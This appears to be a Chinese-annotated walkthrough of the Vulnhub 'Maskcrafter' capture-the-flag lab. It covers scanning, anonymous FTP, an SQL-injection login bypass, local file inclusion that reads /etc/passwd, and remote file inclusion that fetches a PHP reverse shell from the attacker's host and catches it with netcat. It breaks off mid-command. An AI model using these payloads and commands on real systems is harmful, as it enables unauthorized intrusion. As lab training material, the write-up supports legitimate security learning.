Maskcrafter
识别目标主机IP地址
- ─(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
- Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
-
- 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
- _____________________________________________________________________________
- IP At MAC Address Count Len MAC Vendor / Hostname
- -----------------------------------------------------------------------------
- 192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
- 192.168.56.100 08:00:27:4c:3f:93 1 60 PCS Systemtechnik GmbH
- 192.168.56.254 08:00:27:1c:48:cc 1 60 PCS Systemtechnik GmbH
NMAP扫描
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
- Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-09 19:59 EDT
- Nmap scan report for www.armour.local (192.168.56.254)
- Host is up (0.000073s latency).
- Not shown: 65526 closed tcp ports (reset)
- PORT STATE SERVICE VERSION
- 21/tcp open ftp vsftpd 2.0.8 or later
- | ftp-anon: Anonymous FTP login allowed (FTP code 230)
- |_drwxr-xr-x 2 112 115 4096 Mar 30 2020 pub
- | ftp-syst:
- | STAT:
- | FTP server status:
- | Connected to 192.168.56.206
- | Logged in as ftp
- | TYPE: ASCII
- | No session bandwidth limit
- | Session timeout in seconds is 300
- | Control connection is plain text
- | Data connections will be plain text
- | At session startup, client count was 3
- | vsFTPd 3.0.3 - secure, fast, stable
- |_End of status
- 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
- | ssh-hostkey:
- | 2048 8f1b43230a248c66ad3da2b969334dd7 (RSA)
- | 256 8a2c857c2d9622f698f24ab67a88df23 (ECDSA)
- |_ 256 aca799159cbf6944d9c2962a8f799b6d (ED25519)
- 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
- | http-robots.txt: 1 disallowed entry
- |_/debug
- | http-title: Maskcrafter(TM) Login Page
- |_Requested resource was login.php
- |_http-server-header: Apache/2.4.29 (Ubuntu)
- 111/tcp open rpcbind 2-4 (RPC #100000)
- | rpcinfo:
- | program version port/proto service
- | 100000 2,3,4 111/tcp rpcbind
- | 100000 2,3,4 111/udp rpcbind
- | 100000 3,4 111/tcp6 rpcbind
- | 100000 3,4 111/udp6 rpcbind
- | 100003 3 2049/udp nfs
- | 100003 3 2049/udp6 nfs
- | 100003 3,4 2049/tcp nfs
- | 100003 3,4 2049/tcp6 nfs
- | 100005 1,2,3 35771/tcp6 mountd
- | 100005 1,2,3 35951/udp mountd
- | 100005 1,2,3 47498/udp6 mountd
- | 100005 1,2,3 50685/tcp mountd
- | 100021 1,3,4 45195/tcp6 nlockmgr
- | 100021 1,3,4 46199/tcp nlockmgr
- | 100021 1,3,4 48207/udp6 nlockmgr
- | 100021 1,3,4 53602/udp nlockmgr
- | 100227 3 2049/tcp nfs_acl
- | 100227 3 2049/tcp6 nfs_acl
- | 100227 3 2049/udp nfs_acl
- |_ 100227 3 2049/udp6 nfs_acl
- 2049/tcp open nfs_acl 3 (RPC #100227)
- 38041/tcp open mountd 1-3 (RPC #100005)
- 45351/tcp open mountd 1-3 (RPC #100005)
- 46199/tcp open nlockmgr 1-4 (RPC #100021)
- 50685/tcp open mountd 1-3 (RPC #100005)
- MAC Address: 08:00:27:1C:48:CC (Oracle VirtualBox virtual NIC)
- Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ ftp 192.168.56.254
- Connected to 192.168.56.254.
- 220 Welcome to maskcrafter(TM) FTP service.
- Name (192.168.56.254:kali): anonymous
- 331 Please specify the password.
- Password:
- 230 Login successful.
- Remote system type is UNIX.
- Using binary mode to transfer files.
- ftp> ls -alh
- 229 Entering Extended Passive Mode (|||28847|)
- 150 Here comes the directory listing.
- drwxr-xr-x 3 0 115 4096 Mar 21 2020 .
- drwxr-xr-x 3 0 115 4096 Mar 21 2020 ..
- drwxr-xr-x 2 112 115 4096 Mar 30 2020 pub
- 226 Directory send OK.
- ftp> cd pub
- 250 Directory successfully changed.
- ftp> ls -alh
- 229 Entering Extended Passive Mode (|||63424|)
- 150 Here comes the directory listing.
- drwxr-xr-x 2 112 115 4096 Mar 30 2020 .
- drwxr-xr-x 3 0 115 4096 Mar 21 2020 ..
- -rw-r--r-- 1 0 0 430 Mar 30 2020 NOTES.txt
- -rw-r--r-- 1 0 0 229 Mar 23 2020 cred.zip
- 226 Directory send OK.
- ftp> get NOTES.txt
- local: NOTES.txt remote: NOTES.txt
- 229 Entering Extended Passive Mode (|||15955|)
- 150 Opening BINARY mode data connection for NOTES.txt (430 bytes).
- 100% |********************************************************************************| 430 273.03 KiB/s 00:00 ETA
- 226 Transfer complete.
- 430 bytes received in 00:00 (224.31 KiB/s)
- ftp> get cred.zip
- local: cred.zip remote: cred.zip
- 229 Entering Extended Passive Mode (|||30982|)
- 150 Opening BINARY mode data connection for cred.zip (229 bytes).
- 100% |********************************************************************************| 229 427.59 KiB/s 00:00 ETA
- 226 Transfer complete.
- 229 bytes received in 00:00 (197.90 KiB/s)
- ftp> quit
- 221 Goodbye.
-
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ cat NOTES.txt
- Dear Web Administrator,
- I've got a few points to make:
- 1.) Please choose a stronger password for /debug web-directory.
- Having a username as 'admin' is already guessable but selecting a dictionary password is a big NO-NO.
- 2.) Please revisit the SQL code to prevent SQL injections because the way it is now, it is absolutely terrible.
- Basically, we are hoping and praying that no hacker ever finds out about this.
- Regards,
- Root
-
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ ls -alh
- total 20K
- drwxr-xr-x 2 kali kali 4.0K Apr 9 20:00 .
- drwxr-xr-x 83 kali kali 4.0K Apr 9 19:54 ..
- -rw-r--r-- 1 kali kali 229 Mar 23 2020 cred.zip
- -rw-r--r-- 1 root root 2.7K Apr 9 19:59 nmap_full_scan
- -rw-r--r-- 1 kali kali 430 Mar 29 2020 NOTES.txt
-
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ unzip cred.zip
- Archive: cred.zip
- [cred.zip] cred.txt password:
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ zip2john cred.zip > hashes
- ver 1.0 efh 5455 efh 7875 cred.zip/cred.txt PKZIP Encr: 2b chk, TS_chk, cmplen=47, decmplen=35, crc=5D29BC84 ts=63CD cs=63cd type=0
-
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
- Using default input encoding: UTF-8
- Loaded 1 password hash (PKZIP [32/64])
- Will run 2 OpenMP threads
- Press 'q' or Ctrl-C to abort, almost any other key for status
- 0g 0:00:00:01 DONE (2023-04-09 20:00) 0g/s 9562Kp/s 95
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ showmount -e 192.168.56.254
- Export list for 192.168.56.254:
Kali Linux访问80端口,为用户登录界面,用admin' or 1=1 -- 即可轻松绕过。
登录成功后,在页面源代码中有注释:- <i>This webpage was created out of urgency and as such some features are still buggy and may not work as intended.</i><br><pre>DB connection ok.</pre><hr>Development in progress, please report any bugs to admin@covid19.localhost<pre>Due to the increase demand for our product, you are to ramp up your productivity by 200%, else suffer a pay cut!</pre>
- <html>
- <head><title>Employee page</title></head>
- <body>
- <h3>Welcome admin' or 1=1 -- !</h3>
-
- <a target="_blank" href="https://www.cnblogs.com/logout.php">Logout</a>
- </body>
- </html>
访问下面的URL,返回的页面没有变化,但是注释参数page,可能存在本地文件包含漏洞- http://192.168.56.254/index.php?page=warning.php
- http://192.168.56.254/index.php?page=../../../../../etc/passwd
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
- bin:x:2:2:bin:/bin:/usr/sbin/nologin
- sys:x:3:3:sys:/dev:/usr/sbin/nologin
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/usr/sbin/nologin
- man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
- lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
- mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
- news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
- uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
- proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
- www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
- backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
- list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
- irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
- nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
- systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
- systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
- syslog:x:102:106::/home/syslog:/usr/sbin/nologin
- messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
- _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
- lxd:x:105:65534::/var/lib/lxd/:/bin/false
- uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
- dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
- landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
- pollinate:x:109:1::/var/cache/pollinate:/bin/false
- sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
- userx:x:1000:1000:userx:/home/userx:/bin/bash
- mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
- researcherx:x:1001:1001:,,,:/home/researcherx:/bin/bash
- ftp:x:112:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
- statd:x:113:65534::/var/lib/nfs:/usr/sbin/nologin
- evdaez:x:1002:1002:,,,:/home/evdaez:/bin/bash
在Kali Linux启动http- http://192.168.56.254/index.php?page=http://192.168.56.206:8000/test.txt
接下来在Kali Linux准备好php reverse文件,然后访问该文件从而得到shell- http://192.168.56.254/index.php?page=http://192.168.56.206:8000/shell.php
- ┌──(kali㉿kali)-[~/Vulnhub/Maskcrafter]
- └─$ sudo nc -nlvp 5555
- [sudo] password for kali:
- listening on [any] 5555 ...
- connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 39276
- Linux maskcrafter 4.15.0-91-generic #92-Ubuntu SMP Fri Feb 28 11:09:48 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
- 08:15:22 up 17 min, 0 users, load average: 0.00, 0.00, 0.02
- USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
- uid=33(www-data) gid=33(www-data) groups=33(www-data)
- /bin/sh: 0: can't access tty; job control turned off
- $ which python
- /usr/bin/python
- $ python -c 'import pty;pty.spawn("/bin/bash")'
- www-data@maskcrafter:/$
[code]www-data@maskcrafter:/var/www/html$ cat db.phpcat db.php |
